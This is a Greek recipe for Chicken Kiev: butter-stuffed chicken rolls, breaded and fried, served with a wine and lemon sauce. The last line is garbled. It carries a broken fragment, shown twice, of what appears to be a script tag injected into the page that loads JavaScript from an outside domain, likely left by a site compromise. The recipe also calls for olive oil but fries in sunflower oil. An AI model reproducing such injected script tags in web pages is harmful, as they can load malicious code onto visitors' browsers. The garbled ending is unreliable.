Κοτόπουλο Κιέβου

Υλικά

κάνει 8

4 στήθη κοτόπουλο χωρίς κόκαλο
Αλάτι
Πιπέρι
3 σκελίδες σκόρδο ψιλοκομμένες
1 χούφτα μαϊντανό, ψιλοκομμένο
2 κουταλιές της σούπας φρέσκο θυμάρι, ψιλοκομμένο
8 φρέσκα φύλλα βασιλικού ψιλοκομμένα σε λωρίδες
8 κουταλιές της σούπας βούτυρο μαλακό
3 αυγά χτυπημένα
1 μεγάλο μπολ γαλέτα
2 φλιτζάνια αλεύρι
3 κουταλιές της σούπας ελαιόλαδο
1 φλιτζάνι λευκό κρασί
Επιπλέον χυμό λεμόνι για τη σάλτσα
8 φέτες λεμόνι

Κοτόπουλο Κιέβου

Εκτέλεση

Σε ξύλο κοπής απλώνετε ένα φύλλο πλαστικής μεμβράνης και βάζετε το φιλέτο κοτόπουλο. Καλύψτε με την περισσευούμενο μεμβράνη το κοτόπουλο και χτυπήστε με το σφυρί μέχρι να ανοίξει.
Σε ένα μεγάλο μπολ ανακατεύετε το μαλακό βούτυρο με όλα τα υπόλοιπα υλικά ψιλοκομμένα εκτός από κρασί και το ελαιόλαδο.
Στη συνέχεια τοποθετήστε τη λεία επιφάνεια του κοτόπουλου πάνω στο ξύλο κοπής και γεμίστε με 1 μπάλα (σχήμα κεφτέ) από το μείγμα βουτύρου.
Τυλίξτε κάθε φιλέτο κοτόπουλο σε ρολό και στερεώνετε καλά με οδοντογλυφίδα.

Στη συνέχεια περάστε από αλεύρι τα ρολά, μετά στο μείγμα αυγού και έπειτα στη γαλέτα και βάζετε στο ψυγείο για 30 – 40 λεπτά.
Ζεσταίνετε το ηλιέλαιο σε μέτρια φωτιά σε ένα βαθύ τηγάνι και τηγανίστε τα ρολά κοτόπουλου μέχρι να πάρουν ομοιόμορφο χρώμα από όλες τις πλευρές για περίπου 5 – 6 λεπτά.
Αφαιρέστε τα ρολά από το τηγάνι (κρατήστε το ηλιέλαιο) και ρίχνετε το κρασί, το χυμό λεμονιού, τις φέτες λεμονιού και βράζετε μέχρι να εξατμιστεί το κρασί και δέσει η σάλτσα.
Σερβίρετε ραντίζοντας τη σάλτσα κρασιού.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>